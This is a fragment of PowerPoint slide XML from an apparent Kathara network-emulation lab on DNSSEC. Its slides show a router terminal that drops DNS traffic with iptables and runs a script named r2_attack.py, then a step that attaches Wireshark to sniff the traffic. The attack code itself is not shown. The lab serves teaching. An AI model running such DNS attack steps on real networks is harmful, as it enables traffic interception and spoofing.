                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>python3 r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECE6BD3-20E6-06AD-FF6E-B7FF07921F06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868024" y="2378845"/>
              <a:ext cx="6712254" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01A2001-F7B1-804F-BC39-5F8CDB73498B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851D9A62-0D93-F1D9-18D5-BB3CA5E0E619}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB089D8E-CE34-9808-5698-5B64A66635BF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51956C1-03DF-D5E5-FEE9-61082B3612BD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17157015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6" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2E0A32-A59E-7612-9251-F9780ACA9F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>sniff the traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFF8E2DB-E1FE-B10A-80D1-645659F9A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>connect the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t> device to collision domain B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3000 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>sniff eth1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1F9DF1-1F0D-8325-DDE9-67D58F707DBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3C7413-D9D4-2179-C5E9-5224B2E2C498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67286795-F9BA-935F-0E5F-3744B5411972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2191793"/>
            <a:ext cx="10972800" cy="1237207"/>
            <a:chOff x="607480" y="2378845"/>
            <a:chExt cx="10972800" cy="1237207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC13EA54-B75A-3AAE-2DC5-04F2EE76EA14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799" cy="947758"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/kithara-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lconfig</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -n </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{059A51EC-24EC-09A8-A931-0C514F033872}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="289449"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93CD761F-2706-D473-1E1E-99D04DF635BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C11FC76-01CB-87C6-EA82-F1EF789555C7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2388118-C220-05C9-29AA-B1B9CB515DB1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{747AF88A-25F8-40E6-3308-9590AC754119}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>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174BB2E-0728-0C05-D06C-D28D6863CD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, software, Icona del computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C70885B-EF22-B2CF-DDD6-DEF00C566F1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36914" y="1082911"/>
            <a:ext cx="9571511" cy="5436658"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8299989-A384-72FB-C50C-B02A671230A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
